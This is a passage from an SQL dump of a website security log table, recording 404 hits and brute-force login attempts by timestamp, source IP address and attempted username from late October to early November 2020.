07:59:41','2020-10-28 12:59:41','5.188.84.92',NULL,NULL),(72861,'four_oh_four','2020-10-28 10:28:41','2020-10-28 15:28:41','157.55.39.165',NULL,NULL),(72862,'four_oh_four','2020-10-28 10:32:39','2020-10-28 15:32:39','178.159.37.139',NULL,NULL),(72863,'four_oh_four','2020-10-28 10:56:09','2020-10-28 15:56:09','157.55.39.3',NULL,NULL),(72864,'four_oh_four','2020-10-28 13:07:45','2020-10-28 18:07:45','37.57.45.247',NULL,NULL),(72865,'four_oh_four','2020-10-28 14:01:10','2020-10-28 19:01:10','184.154.139.21',NULL,NULL),(72866,'four_oh_four','2020-10-28 16:49:24','2020-10-28 21:49:24','94.139.224.104',NULL,NULL),(72867,'four_oh_four','2020-10-28 18:19:02','2020-10-28 23:19:02','5.188.84.92',NULL,NULL),(72868,'four_oh_four','2020-10-28 20:02:48','2020-10-29 01:02:48','193.106.30.100',NULL,NULL),(72869,'four_oh_four','2020-10-28 20:54:30','2020-10-29 01:54:30','114.119.157.110',NULL,NULL),(72870,'four_oh_four','2020-10-28 21:55:39','2020-10-29 02:55:39','149.202.86.18',NULL,NULL),(72871,'four_oh_four','2020-10-28 22:58:45','2020-10-29 03:58:45','207.46.13.54',NULL,NULL),(72872,'four_oh_four','2020-10-28 23:14:40','2020-10-29 04:14:40','205.186.165.174',NULL,NULL),(72873,'four_oh_four','2020-10-29 00:27:35','2020-10-29 05:27:35','5.188.84.251',NULL,NULL),(72874,'four_oh_four','2020-10-29 01:09:22','2020-10-29 06:09:22','45.15.236.120',NULL,NULL),(72875,'four_oh_four','2020-10-29 02:48:02','2020-10-29 07:48:02','144.76.102.243',NULL,NULL),(72876,'four_oh_four','2020-10-29 03:53:55','2020-10-29 08:53:55','157.55.39.3',NULL,NULL),(72877,'four_oh_four','2020-10-29 04:35:00','2020-10-29 09:35:00','46.161.15.88',NULL,NULL),(72878,'four_oh_four','2020-10-29 05:06:00','2020-10-29 10:06:00','95.104.162.99',NULL,NULL),(72879,'four_oh_four','2020-10-29 07:17:03','2020-10-29 12:17:03','190.152.12.54',NULL,NULL),(72880,'four_oh_four','2020-10-29 07:42:29','2020-10-29 12:42:29','192.126.226.139',NULL,NULL),(72881,'four_oh_four','2020-10-29 07:47:46','2020-10-29 12:47:46','5.189.133.231',NULL,NULL),(72882,'four_oh_four','2020-10-29 08:10:45','2020-10-29 13:10:45','109.194.246.48',NULL,NULL),(72883,'four_oh_four','2020-10-29 08:41:37','2020-10-29 13:41:37','114.119.145.125',NULL,NULL),(72884,'four_oh_four','2020-10-29 09:11:22','2020-10-29 14:11:22','45.86.201.173',NULL,NULL),(72885,'four_oh_four','2020-10-29 09:41:51','2020-10-29 14:41:51','108.167.156.27',NULL,NULL),(72886,'four_oh_four','2020-10-29 09:44:14','2020-10-29 14:44:14','138.197.11.160',NULL,NULL),(72887,'four_oh_four','2020-10-29 11:56:02','2020-10-29 16:56:02','193.106.30.100',NULL,NULL),(72888,'four_oh_four','2020-10-29 12:38:56','2020-10-29 17:38:56','194.36.87.13',NULL,NULL),(72889,'four_oh_four','2020-10-29 12:58:46','2020-10-29 17:58:46','193.106.30.100',NULL,NULL),(72890,'four_oh_four','2020-10-29 13:27:46','2020-10-29 18:27:46','103.214.68.136',NULL,NULL),(72891,'four_oh_four','2020-10-29 14:00:11','2020-10-29 19:00:11','66.249.65.181',NULL,NULL),(72892,'four_oh_four','2020-10-29 14:07:08','2020-10-29 19:07:08','184.154.139.17',NULL,NULL),(72893,'four_oh_four','2020-10-29 14:26:51','2020-10-29 19:26:51','66.249.65.180',NULL,NULL),(72894,'four_oh_four','2020-10-29 16:33:21','2020-10-29 21:33:21','114.119.145.125',NULL,NULL),(72895,'four_oh_four','2020-10-29 16:42:40','2020-10-29 21:42:40','114.119.136.66',NULL,NULL),(72896,'four_oh_four','2020-10-29 17:22:53','2020-10-29 22:22:53','188.122.82.146',NULL,NULL),(72897,'four_oh_four','2020-10-29 18:39:17','2020-10-29 23:39:17','78.29.72.195',NULL,NULL),(72898,'four_oh_four','2020-10-29 18:43:58','2020-10-29 23:43:58','178.70.73.197',NULL,NULL),(72899,'four_oh_four','2020-10-29 18:52:10','2020-10-29 23:52:10','114.119.141.146',NULL,NULL),(72900,'four_oh_four','2020-10-29 20:19:11','2020-10-30 01:19:11','114.119.151.107',NULL,NULL),(72901,'four_oh_four','2020-10-29 20:47:35','2020-10-30 01:47:35','108.62.49.207',NULL,NULL),(72902,'four_oh_four','2020-10-29 21:55:36','2020-10-30 02:55:36','114.119.134.41',NULL,NULL),(72903,'four_oh_four','2020-10-29 22:06:14','2020-10-30 03:06:14','114.119.148.105',NULL,NULL),(72904,'four_oh_four','2020-10-29 23:03:11','2020-10-30 04:03:11','194.36.87.13',NULL,NULL),(72905,'four_oh_four','2020-10-29 23:29:03','2020-10-30 04:29:03','94.139.224.104',NULL,NULL),(72906,'four_oh_four','2020-10-29 23:46:42','2020-10-30 04:46:42','198.71.239.6',NULL,NULL),(72907,'four_oh_four','2020-10-29 23:46:42','2020-10-30 04:46:42','198.71.239.6',NULL,NULL),(72908,'four_oh_four','2020-10-29 23:49:27','2020-10-30 04:49:27','185.232.22.139',NULL,NULL),(72909,'four_oh_four','2020-10-29 23:49:35','2020-10-30 04:49:35','185.232.22.139',NULL,NULL),(72910,'four_oh_four','2020-10-29 23:49:40','2020-10-30 04:49:40','185.232.22.139',NULL,NULL),(72911,'four_oh_four','2020-10-29 23:49:44','2020-10-30 04:49:44','185.232.22.139',NULL,NULL),(72912,'four_oh_four','2020-10-30 00:23:15','2020-10-30 05:23:15','185.150.190.196',NULL,NULL),(72913,'four_oh_four','2020-10-30 00:23:12','2020-10-30 05:23:12','185.150.190.196',NULL,NULL),(72914,'four_oh_four','2020-10-30 01:49:07','2020-10-30 06:49:07','52.201.182.91',NULL,NULL),(72915,'four_oh_four','2020-10-30 01:49:11','2020-10-30 06:49:11','52.201.182.91',NULL,NULL),(72916,'four_oh_four','2020-10-30 03:33:36','2020-10-30 08:33:36','114.119.145.125',NULL,NULL),(72917,'four_oh_four','2020-10-30 04:20:47','2020-10-30 09:20:47','188.122.82.146',NULL,NULL),(72918,'four_oh_four','2020-10-30 04:57:31','2020-10-30 09:57:31','95.65.81.152',NULL,NULL),(72919,'four_oh_four','2020-10-30 09:19:47','2020-10-30 14:19:47','205.186.165.174',NULL,NULL),(72920,'four_oh_four','2020-10-30 10:11:06','2020-10-30 15:11:06','114.119.158.13',NULL,NULL),(72921,'four_oh_four','2020-10-30 10:53:00','2020-10-30 15:53:00','51.195.201.76',NULL,NULL),(72922,'four_oh_four','2020-10-30 10:53:03','2020-10-30 15:53:03','51.195.201.76',NULL,NULL),(72923,'four_oh_four','2020-10-30 10:53:06','2020-10-30 15:53:06','51.195.201.76',NULL,NULL),(72924,'four_oh_four','2020-10-30 10:53:18','2020-10-30 15:53:18','51.195.201.76',NULL,NULL),(72925,'four_oh_four','2020-10-30 10:53:20','2020-10-30 15:53:20','51.195.201.76',NULL,NULL),(72926,'four_oh_four','2020-10-30 10:53:23','2020-10-30 15:53:23','51.195.201.76',NULL,NULL),(72927,'four_oh_four','2020-10-30 10:53:25','2020-10-30 15:53:25','51.195.201.76',NULL,NULL),(72928,'four_oh_four','2020-10-30 10:53:28','2020-10-30 15:53:28','51.195.201.76',NULL,NULL),(72929,'four_oh_four','2020-10-30 10:53:31','2020-10-30 15:53:31','51.195.201.76',NULL,NULL),(72930,'four_oh_four','2020-10-30 10:53:34','2020-10-30 15:53:34','51.195.201.76',NULL,NULL),(72931,'four_oh_four','2020-10-30 10:53:36','2020-10-30 15:53:36','51.195.201.76',NULL,NULL),(72932,'four_oh_four','2020-10-30 10:53:39','2020-10-30 15:53:39','51.195.201.76',NULL,NULL),(72933,'four_oh_four','2020-10-30 10:53:44','2020-10-30 15:53:44','51.195.201.76',NULL,NULL),(72934,'four_oh_four','2020-10-30 10:53:46','2020-10-30 15:53:46','51.195.201.76',NULL,NULL),(72935,'four_oh_four','2020-10-30 10:53:49','2020-10-30 15:53:49','51.195.201.76',NULL,NULL),(72936,'four_oh_four','2020-10-30 10:53:52','2020-10-30 15:53:52','51.195.201.76',NULL,NULL),(72937,'four_oh_four','2020-10-30 10:53:55','2020-10-30 15:53:55','51.195.201.76',NULL,NULL),(72938,'four_oh_four','2020-10-30 10:53:58','2020-10-30 15:53:58','51.195.201.76',NULL,NULL),(72939,'four_oh_four','2020-10-30 10:54:00','2020-10-30 15:54:00','51.195.201.76',NULL,NULL),(72940,'four_oh_four','2020-10-30 10:54:03','2020-10-30 15:54:03','51.195.201.76',NULL,NULL),(72941,'four_oh_four','2020-10-30 11:27:38','2020-10-30 16:27:38','114.119.130.104',NULL,NULL),(72942,'four_oh_four','2020-10-30 11:52:46','2020-10-30 16:52:46','5.188.84.92',NULL,NULL),(72943,'four_oh_four','2020-10-30 12:45:21','2020-10-30 17:45:21','112.124.0.114',NULL,NULL),(72944,'four_oh_four','2020-10-30 12:45:22','2020-10-30 17:45:22','112.124.0.114',NULL,NULL),(72945,'four_oh_four','2020-10-30 12:45:23','2020-10-30 17:45:23','112.124.0.114',NULL,NULL),(72946,'four_oh_four','2020-10-30 12:45:21','2020-10-30 17:45:21','112.124.0.114',NULL,NULL),(72947,'four_oh_four','2020-10-30 12:45:22','2020-10-30 17:45:22','112.124.0.114',NULL,NULL),(72948,'four_oh_four','2020-10-30 12:45:22','2020-10-30 17:45:22','112.124.0.114',NULL,NULL),(72949,'four_oh_four','2020-10-30 12:45:21','2020-10-30 17:45:21','112.124.0.114',NULL,NULL),(72950,'four_oh_four','2020-10-30 12:45:22','2020-10-30 17:45:22','112.124.0.114',NULL,NULL),(72951,'four_oh_four','2020-10-30 12:45:21','2020-10-30 17:45:21','112.124.0.114',NULL,NULL),(72952,'four_oh_four','2020-10-30 12:45:21','2020-10-30 17:45:21','112.124.0.114',NULL,NULL),(72953,'four_oh_four','2020-10-30 14:04:15','2020-10-30 19:04:15','184.154.139.19',NULL,NULL),(72954,'four_oh_four','2020-10-30 14:14:55','2020-10-30 19:14:55','5.227.228.22',NULL,NULL),(72955,'four_oh_four','2020-10-30 16:19:15','2020-10-30 21:19:15','5.135.154.155',NULL,NULL),(72956,'four_oh_four','2020-10-30 16:21:18','2020-10-30 21:21:18','5.135.154.155',NULL,NULL),(72957,'four_oh_four','2020-10-30 16:30:10','2020-10-30 21:30:10','114.119.136.66',NULL,NULL),(72958,'four_oh_four','2020-10-30 18:11:18','2020-10-30 23:11:18','193.106.30.100',NULL,NULL),(72959,'four_oh_four','2020-10-30 18:43:32','2020-10-30 23:43:32','207.46.13.243',NULL,NULL),(72960,'four_oh_four','2020-10-30 20:34:24','2020-10-31 01:34:24','114.119.145.125',NULL,NULL),(72961,'four_oh_four','2020-10-30 21:11:56','2020-10-31 02:11:56','109.252.2.48',NULL,NULL),(72962,'four_oh_four','2020-10-30 22:03:00','2020-10-31 03:03:00','95.73.40.214',NULL,NULL),(72963,'four_oh_four','2020-10-30 22:05:04','2020-10-31 03:05:04','13.58.24.10',NULL,NULL),(72964,'four_oh_four','2020-10-30 23:28:08','2020-10-31 04:28:08','114.119.151.107',NULL,NULL),(72965,'four_oh_four','2020-10-31 02:12:24','2020-10-31 07:12:24','66.249.65.179',NULL,NULL),(72966,'four_oh_four','2020-10-31 02:30:21','2020-10-31 07:30:21','66.249.65.180',NULL,NULL),(72967,'four_oh_four','2020-10-31 02:52:38','2020-10-31 07:52:38','114.119.134.41',NULL,NULL),(72968,'four_oh_four','2020-10-31 04:51:12','2020-10-31 09:51:12','114.119.157.110',NULL,NULL),(72969,'four_oh_four','2020-10-31 10:27:04','2020-10-31 15:27:04','45.125.65.31',NULL,NULL),(72970,'four_oh_four','2020-10-31 12:25:45','2020-10-31 17:25:45','178.159.37.139',NULL,NULL),(72971,'four_oh_four','2020-10-31 13:00:00','2020-10-31 18:00:00','89.109.35.231',NULL,NULL),(72972,'four_oh_four','2020-10-31 13:28:12','2020-10-31 18:28:12','77.81.136.106',NULL,NULL),(72973,'four_oh_four','2020-10-31 13:28:19','2020-10-31 18:28:19','77.81.136.106',NULL,NULL),(72974,'four_oh_four','2020-10-31 13:28:23','2020-10-31 18:28:23','77.81.136.106',NULL,NULL),(72975,'four_oh_four','2020-10-31 13:28:27','2020-10-31 18:28:27','77.81.136.106',NULL,NULL),(72976,'four_oh_four','2020-10-31 14:03:41','2020-10-31 19:03:41','184.154.139.19',NULL,NULL),(72977,'four_oh_four','2020-10-31 15:19:26','2020-10-31 20:19:26','94.139.237.48',NULL,NULL),(72978,'four_oh_four','2020-10-31 16:43:37','2020-10-31 21:43:37','114.119.134.41',NULL,NULL),(72979,'four_oh_four','2020-10-31 19:31:54','2020-11-01 00:31:54','114.119.143.145',NULL,NULL),(72980,'four_oh_four','2020-10-31 21:30:18','2020-11-01 02:30:18','5.196.23.219',NULL,NULL),(72981,'brute_force','2020-10-31 21:39:30','2020-11-01 02:39:30','5.188.62.140',NULL,NULL),(72982,'brute_force','2020-10-31 21:39:30','2020-11-01 02:39:30',NULL,NULL,'adminu'),(72983,'brute_force','2020-10-31 22:08:12','2020-11-01 03:08:12','5.188.62.140',NULL,NULL),(72984,'brute_force','2020-10-31 22:08:12','2020-11-01 03:08:12',NULL,NULL,'adminu'),(72985,'brute_force','2020-10-31 22:36:57','2020-11-01 03:36:57','5.188.62.140',NULL,NULL),(72986,'brute_force','2020-10-31 22:36:57','2020-11-01 03:36:57',NULL,NULL,'adminu'),(72987,'four_oh_four','2020-10-31 22:53:16','2020-11-01 03:53:16','92.38.136.69',NULL,NULL),(72988,'four_oh_four','2020-11-01 01:42:33','2020-11-01 06:42:33','114.119.145.125',NULL,NULL),(72989,'four_oh_four','2020-11-01 02:00:36','2020-11-01 07:00:36','66.249.65.180',NULL,NULL),(72990,'four_oh_four','2020-11-01 04:19:29','2020-11-01 09:19:29','114.119.130.104',NULL,NULL),(72991,'four_oh_four','2020-11-01 05:19:09','2020-11-01 10:19:09','193.106.30.100',NULL,NULL),(72992,'four_oh_four','2020-11-01 05:19:13','2020-11-01 10:19:13','193.106.30.100',NULL,NULL),(72993,'four_oh_four','2020-11-01 05:22:20','2020-11-01 10:22:20','204.93.169.72',NULL,NULL),(72994,'four_oh_four','2020-11-01 07:33:51','2020-11-01 12:33:51','69.61.200.104',NULL,NULL),(72995,'four_oh_four','2020-11-01 08:15:07','2020-11-01 13:15:07','188.122.82.146',NULL,NULL),(72996,'four_oh_four','2020-11-01 08:15:07','2020-11-01 13:15:07','188.122.82.146',NULL,NULL),(72997,'four_oh_four','2020-11-01 08:23:39','2020-11-01 13:23:39','37.57.45.247',NULL,NULL),(72998,'four_oh_four','2020-11-01 09:48:22','2020-11-01 14:48:22','66.249.65.183',NULL,NULL),(72999,'four_oh_four','2020-11-01 13:39:09','2020-11-01 18:39:09','93.124.125.4',NULL,NULL),(73000,'four_oh_four','2020-11-01 13:39:57','2020-11-01 18:39:57','85.187.128.36',NULL,NULL),(73001,'four_oh_four','2020-11-01 15:04:25','2020-11-01 20:04:25','184.154.139.20',NULL,NULL),(73002,'four_oh_four','2020-11-01 15:25:29','2020-11-01 20:25:29','188.122.82.146',NULL,NULL),(73003,'four_oh_four','2020-11-01 15:51:40','2020-11-01 20:51:40','185.246.210.8',NULL,NULL),(73004,'four_oh_four','2020-11-01 19:01:29','2020-11-02 00:01:29','178.121.236.129',NULL,NULL),(73005,'four_oh_four','2020-11-01 19:23:55','2020-11-02 00:23:55','94.139.237.48',NULL,NULL),(73006,'four_oh_four','2020-11-01 19:31:51','2020-11-02 00:31:51','114.119.151.107',NULL,NULL),(73007,'four_oh_four','2020-11-01 19:33:43','2020-11-02 00:33:43','193.106.30.100',NULL,NULL),(73008,'four_oh_four','2020-11-01 20:33:55','2020-11-02 01:33:55','3.94.137.21',NULL,NULL),(73009,'four_oh_four','2020-11-01 20:33:57','2020-11-02 01:33:57','3.94.137.21',NULL,NULL),(73010,'four_oh_four','2020-11-01 21:34:29','2020-11-02 02:34:29','188.122.82.146',NULL,NULL),(73011,'four_oh_four','2020-11-01 21:34:29','2020-11-02 02:34:29','188.122.82.146',NULL,NULL),(73012,'four_oh_four','2020-11-01 21:34:29','2020-11-02 02:34:29','188.122.82.146',NULL,NULL),(73013,'four_oh_four','2020-11-01 21:56:49','2020-11-02 02:56:49','188.122.82.146',NULL,NULL),(73014,'four_oh_four','2020-11-01 21:56:49','2020-11-02 02:56:49','188.122.82.146',NULL,NULL),(73015,'four_oh_four','2020-11-01 23:06:49','2020-11-02 04:06:49','66.249.65.180',NULL,NULL),(73016,'four_oh_four','2020-11-02 00:00:14','2020-11-02 05:00:14','51.104.33.200',NULL,NULL),(73017,'four_oh_four','2020-11-02 03:15:56','2020-11-02 08:15:56','45.62.216.111',NULL,NULL),(73018,'four_oh_four','2020-11-02 04:27:30','2020-11-02 09:27:30','114.119.158.13',NULL,NULL),(73019,'four_oh_four','2020-11-02 08:10:02','2020-11-02 13:10:02','94.237.86.251',NULL,NULL),(73020,'four_oh_four','2020-11-02 08:10:04','2020-11-02 13:10:04','5.189.131.202',NULL,NULL),(73021,'four_oh_four','2020-11-02 08:10:11','2020-11-02 13:10:11','94.237.86.251',NULL,NULL),(73022,'four_oh_four','2020-11-02 08:10:13','2020-11-02 13:10:13','5.189.131.202',NULL,NULL),(73023,'four_oh_four','2020-11-02 08:10:14','2020-11-02 13:10:14','94.237.86.251',NULL,NULL),(73024,'four_oh_four','2020-11-02 08:10:15','2020-11-02 13:10:15','5.189.131.202',NULL,NULL),(73025,'four_oh_four','2020-11-02 08:10:18','2020-11-02 13:10:18','94.237.86.251',NULL,NULL),(73026,'four_oh_four','2020-11-02 08:10:20','2020-11-02 13:10:20','5.189.131.202',NULL,NULL),(73027,'four_oh_four','2020-11-02 08:43:28','2020-11-02 13:43:28','179.43.157.77',NULL,NULL),(73028,'four_oh_four','2020-11-02 10:28:23','2020-11-02 15:28:23','176.109.236.207',NULL,NULL),(73029,'four_oh_four','2020-11-02 11:18:33','2020-11-02 16:18:33','183.91.78.211',NULL,NULL),(73030,'four_oh_four','2020-11-02 11:18:57','2020-11-02 16:18:57','132.148.106.7',NULL,NULL),(73031,'four_oh_four','2020-11-02 11:32:23','2020-11-02 16:32:23','193.106.30.100',NULL,NULL),(73032,'four_oh_four','2020-11-02 12:29:41','2020-11-02 17:29:41','124.217.198.187',NULL,NULL),(73033,'four_oh_four','2020-11-02 13:58:26','2020-11-02 18:58:26','13.66.139.2',NULL,NULL),(73034,'four_oh_four','2020-11-02 14:35:08','2020-11-02 19:35:08','178.128.151.69',NULL,NULL),(73035,'four_oh_four','2020-11-02 14:40:31','2020-11-02 19:40:31','178.128.151.69',NULL,NULL),(73036,'four_oh_four','2020-11-02 15:10:18','2020-11-02 20:10:18','184.154.139.21',NULL,NULL),(73037,'four_oh_four','2020-11-02 16:45:47','2020-11-02 21:45:47','178.176.113.144',NULL,NULL),(73038,'four_oh_four','2020-11-02 16:45:51','2020-11-02 21:45:51','178.176.113.144',NULL,NULL),(73039,'four_oh_four','2020-11-02 18:19:00','2020-11-02 23:19:00','114.119.158.13',NULL,NULL),(73040,'four_oh_four','2020-11-02 18:50:48','2020-11-02 23:50:48','176.99.147.238',NULL,NULL),(73041,'four_oh_four','2020-11-02 18:57:00','2020-11-02 23:57:00','188.122.82.146',NULL,NULL),(73042,'four_oh_four','2020-11-02 20:42:54','2020-11-03 01:42:54','114.119.151.107',NULL,NULL),(73043,'four_oh_four','2020-11-03 03:59:56','2020-11-03 08:59:56','157.55.39.158',NULL,NULL),(73044,'four_oh_four','2020-11-03 06:35:53','2020-11-03 11:35:53','114.119.134.41',NULL,NULL),(73045,'four_oh_four','2020-11-03 07:17:13','2020-11-03 12:17:13','114.119.134.41',NULL,NULL),(73046,'four_oh_four','2020-11-03 08:02:18','2020-11-03 13:02:18','5.196.23.219',NULL,NULL),(73047,'four_oh_four','2020-11-03 10:52:28','2020-11-03 15:52:28','13.66.139.2',NULL,NULL),(73048,'four_oh_four','2020-11-03 10:53:13','2020-11-03 15:53:13','178.159.37.139',NULL,NULL),(73049,'four_oh_four','2020-11-03 11:44:05','2020-11-03 16:44:05','69.160.160.51',NULL,NULL),(73050,'four_oh_four','2020-11-03 11:44:17','2020-11-03 16:44:17','69.160.160.51',NULL,NULL),(73051,'four_oh_four','2020-11-03 12:12:46','2020-11-03 17:12:46','172.245.228.29',NULL,NULL),(73052,'four_oh_four','2020-11-03 12:41:38','2020-11-03 17:41:38','66.249.65.180',NULL,NULL),(73053,'four_oh_four','2020-11-03 15:08:00','2020-11-03 20:08:00','184.154.139.19',NULL,NULL),(73054,'four_oh_four','2020-11-03 15:18:03','2020-11-03 20:18:03','114.119.158.13',NULL,NULL),(73055,'four_oh_four','2020-11-03 15:30:08','2020-11-03 20:30:08','193.106.30.100',NULL,NULL),(73056,'four_oh_four','2020-11-03 16:31:18','2020-11-03 21:31:18','114.119.151.107',NULL,NULL),(73057,'four_oh_four','2020-11-03 18:31:44','2020-11-03 23:31:44','157.55.39.167',NULL,NULL),(73058,'four_oh_four','2020-11-03 20:38:29','2020-11-04 01:38:29','114.119.145.125',NULL,NULL),(73059,'four_oh_four','2020-11-03 21:25:33','2020-11-04 02:25:33','157.55.39.167',NULL,NULL),(73060,'four_oh_four','2020-11-03 23:15:47','2020-11-04 04:15:47','114.119.145.125',NULL,NULL),(73061,'four_oh_four','2020-11-03 23:25:34','2020-11-04 04:25:34','114.119.158.13',NULL,NULL),(73062,'four_oh_four','2020-11-04 00:03:07','2020-11-04 05:03:07','114.119.157.110',NULL,NULL),(73063,'four_oh_four','2020-11-04 04:59:38','2020-11-04 09:59:38','37.233.17.225',NULL,NULL),(73064,'four_oh_four','2020-11-04 07:45:06','2020-11-04 12:45:06','193.106.30.100',NULL,NULL),(73065,'four_oh_four','2020-11-04 07:50:50','2020-11-04 12:50:50','52.201.182.91',NULL,NULL),(73066,'four_oh_four','2020-11-04 08:45:25','2020-11-04 13:45:25','114.119.151.107',NULL,NULL),(73067,'four_oh_four','2020-11-04 10:57:44','2020-11-04 15:57:44','176.192.182.15',NULL,NULL),(73068,'four_oh_four','2020-11-04 11:13:23','2020-11-04 16:13:23','85.239.35.123',NULL,NULL),(73069,'four_oh_four','2020-11-04 11:22:46','2020-11-04 16:22:46','114.119.136.66',NULL,NULL),(73070,'four_oh_four','2020-11-04 11:26:11','2020-11-04 16:26:11','5.188.210.18',NULL,NULL),(73071,'four_oh_four','2020-11-04 11:28:18','2020-11-04 16:28:18','13.66.139.2',NULL,NULL),(73072,'four_oh_four','2020-11-04 12:01:18','2020-11-04 17:01:18','114.119.151.107',NULL,NULL),(73073,'four_oh_four','2020-11-04 12:31:26','2020-11-04 17:31:26','217.171.147.164',NULL,NULL),(73074,'four_oh_four','2020-11-04 12:58:50','2020-11-04 17:58:50','174.70.241.8',NULL,NULL),(73075,'four_oh_four','2020-11-04 13:18:40','2020-11-04 18:18:40','92.38.136.69',NULL,NULL),(73076,'four_oh_four','2020-11-04 14:37:57','2020-11-04 19:37:57','13.66.139.2',NULL,NULL),(73077,'four_oh_four','2020-11-04 15:10:55','2020-11-04 20:10:55','184.154.139.18',NULL,NULL),(73078,'four_oh_four','2020-11-04 16:02:22','2020-11-04 21:02:22','98.162.25.7',NULL,NULL),(73079,'four_oh_four','2020-11-04 16:40:01','2020-11-04 21:40:01','193.106.30.100',NULL,NULL),(73080,'four_oh_four','2020-11-04 17:10:47','2020-11-04 22:10:47','136.243.253.38',NULL,NULL),(73081,'four_oh_four','2020-11-04 17:21:24','2020-11-04 22:21:24','114.119.134.41',NULL,NULL),(73082,'four_oh_four','2020-11-04 17:26:16','2020-11-04 22:26:16','114.119.141.146',NULL,NULL),(73083,'four_oh_four','2020-11-04 19:16:14','2020-11-05 00:16:14','77.246.158.203',NULL,NULL),(73084,'four_oh_four','2020-11-04 19:28:56','2020-11-05 00:28:56','52.201.182.91',NULL,NULL),(73085,'four_oh_four','2020-11-04 19:29:00','2020-11-05 00:29:00','52.201.182.91',NULL,NULL),(73086,'four_oh_four','2020-11-04 20:59:47','2020-11-05 01:59:47','114.119.134.41',NULL,NULL),(73087,'four_oh_four','2020-11-04 21:43:40','2020-11-05 02:43:40','194.36.87.13',NULL,NULL),(73088,'four_oh_four','2020-11-04 22:00:35','2020-11-05 03:00:35','95.65.81.152',NULL,NULL),(73089,'four_oh_four','2020-11-04 22:57:21','2020-11-05 03:57:21','188.126.73.209',NULL,NULL),(73090,'four_oh_four','2020-11-04 22:57:25','2020-11-05 03:57:25','188.126.73.209',NULL,NULL),(73091,'four_oh_four','2020-11-05 00:43:51','2020-11-05 05:43:51','109.174.19.134',NULL,NULL),(73092,'four_oh_four','2020-11-05 00:58:16','2020-11-05 05:58:16','193.106.30.100',NULL,NULL),(73093,'four_oh_four','2020-11-05 01:30:43','2020-11-05 06:30:43','5.188.84.251',NULL,NULL),(73094,'four_oh_four','2020-11-05 01:52:22','2020-11-05 06:52:22','5.188.84.251',NULL,NULL),(73095,'four_oh_four','2020-11-05 04:27:33','2020-11-05 09:27:33','85.209.89.243',NULL,NULL),(73096,'four_oh_four','2020-11-05 04:40:45','2020-11-05 09:40:45','46.242.12.162',NULL,NULL),(73097,'four_oh_four','2020-11-05 05:49:57','2020-11-05 10:49:57','114.119.148.105',NULL,NULL),(73098,'four_oh_four','2020-11-05 06:10:47','2020-11-05 11:10:47','205.186.140.146',NULL,NULL),(73099,'four_oh_four','2020-11-05 06:16:06','2020-11-05 11:16:06','157.55.39.57',NULL,NULL),(73100,'four_oh_four','2020-11-05 06:50:15','2020-11-05 11:50:15','77.246.159.85',NULL,NULL),(73101,'four_oh_four','2020-11-05 06:56:04','2020-11-05 11:56:04','114.119.136.66',NULL,NULL),(73102,'four_oh_four','2020-11-05 08:04:29','2020-11-05 13:04:29','114.119.151.107',NULL,NULL),(73103,'four_oh_four','2020-11-05 08:33:03','2020-11-05 13:33:03','151.106.15.42',NULL,NULL),(73104,'four_oh_four','2020-11-05 10:03:36','2020-11-05 15:03:36','193.106.30.100',NULL,NULL),(73105,'four_oh_four','2020-11-05 11:10:34','2020-11-05 16:10:34','66.249.65.183',NULL,NULL),(73106,'four_oh_four','2020-11-05 11:35:56','2020-11-05 16:35:56','114.119.136.66',NULL,NULL),(73107,'four_oh_four','2020-11-05 11:40:57','2020-11-05 16:40:57','114.119.141.146',NULL,NULL),(73108,'four_oh_four','2020-11-05 12:10:08','2020-11-05 17:10:08','45.140.166.26',NULL,NULL),(73109,'four_oh_four','2020-11-05 15:09:39','2020-11-05 20:09:39','184.154.139.18',NULL,NULL),(73110,'four_oh_four','2020-11-05 16:11:52','2020-11-05 21:11:52','5.188.211.46',NULL,NULL),(73111,'four_oh_four','2020-11-05 16:38:26','2020-11-05 21:38:26','45.140.54.95',NULL,NULL),(73112,'four_oh_four','2020-11-05 18:43:15','2020-11-05 23:43:15','114.119.136.66',NULL,NULL),(73113,'four_oh_four','2020-11-05 19:04:27','2020-11-06 00:04:27','157.55.39.86',NULL,NULL),(73114,'four_oh_four','2020-11-05 19:25:02','2020-11-06 00:25:02','114.119.151.107',NULL,NULL),(73115,'four_oh_four','2020-11-05 19:25:26','2020-11-06 00:25:26','45.158.44.7',NULL,NULL),(73116,'four_oh_four','2020-11-05 20:42:51','2020-11-06 01:42:51','207.46.13.94',NULL,NULL),(73117,'four_oh_four','2020-11-05 21:27:59','2020-11-06 02:27:59','139.162.7.170',NULL,NULL),(73118,'four_oh_four','2020-11-05 21:31:21','2020-11-06 02:31:21','114.119.151.107',NULL,NULL),(73119,'four_oh_four','2020-11-05 22:00:31','2020-11-06 03:00:31','193.106.30.100',NULL,NULL),(73120,'four_oh_four','2020-11-05 22:41:31','2020-11-06 03:41:31','13.66.139.2',NULL,NULL),(73121,'four_oh_four','2020-11-05 22:48:14','2020-11-06 03:48:14','5.188.84.251',NULL,NULL),(73122,'four_oh_four','2020-11-05 23:27:31','2020-11-06 04:27:31','213.59.158.2',NULL,NULL),(73123,'four_oh_four','2020-11-06 03:18:08','2020-11-06 08:18:08','45.131.193.55',NULL,NULL),(73124,'four_oh_four','2020-11-06 03:36:31','2020-11-06 08:36:31','104.236.142.52',NULL,NULL),(73125,'four_oh_four','2020-11-06 03:36:50','2020-11-06 08:36:50','114.119.148.105',NULL,NULL),(73126,'four_oh_four','2020-11-06 07:09:55','2020-11-06 12:09:55','5.188.84.251',NULL,NULL),(73127,'four_oh_four','2020-11-06 09:14:42','2020-11-06 14:14:42','193.106.30.100',NULL,NULL),(73128,'four_oh_four','2020-11-06 09:58:37','2020-11-06 14:58:37','13.66.139.2',NULL,NULL),(73129,'brute_force','2020-11-06 11:12:49','2020-11-06 16:12:49','5.188.62.214',NULL,NULL),(73130,'brute_force','2020-11-06 11:12:49','2020-11-06 16:12:49',NULL,NULL,'adminu'),(73131,'brute_force','2020-11-06 11:12:54','2020-11-06 16:12:54','5.188.62.214',NULL,NULL),(73132,'brute_force','2020-11-06 11:12:54','2020-11-06 16:12:54',NULL,NULL,'director'),(73133,'four_oh_four','2020-11-06 11:31:01','2020-11-06 16:31:01','114.119.157.110',NULL,NULL),(73134,'brute_force','2020-11-06 11:38:38','2020-11-06 16:38:38','5.188.62.214',NULL,NULL),(73135,'brute_force','2020-11-06 11:38:38','2020-11-06 16:38:38',NULL,NULL,'adminu'),(73136,'brute_force','2020-11-06 11:38:43','2020-11-06 16:38:43','5.188.62.214',NULL,NULL),(73137,'brute_force','2020-11-06 11:38:43','2020-11-06 16:38:43',NULL,NULL,'administrator'),(73138,'brute_force','2020-11-06 12:05:03','2020-11-06 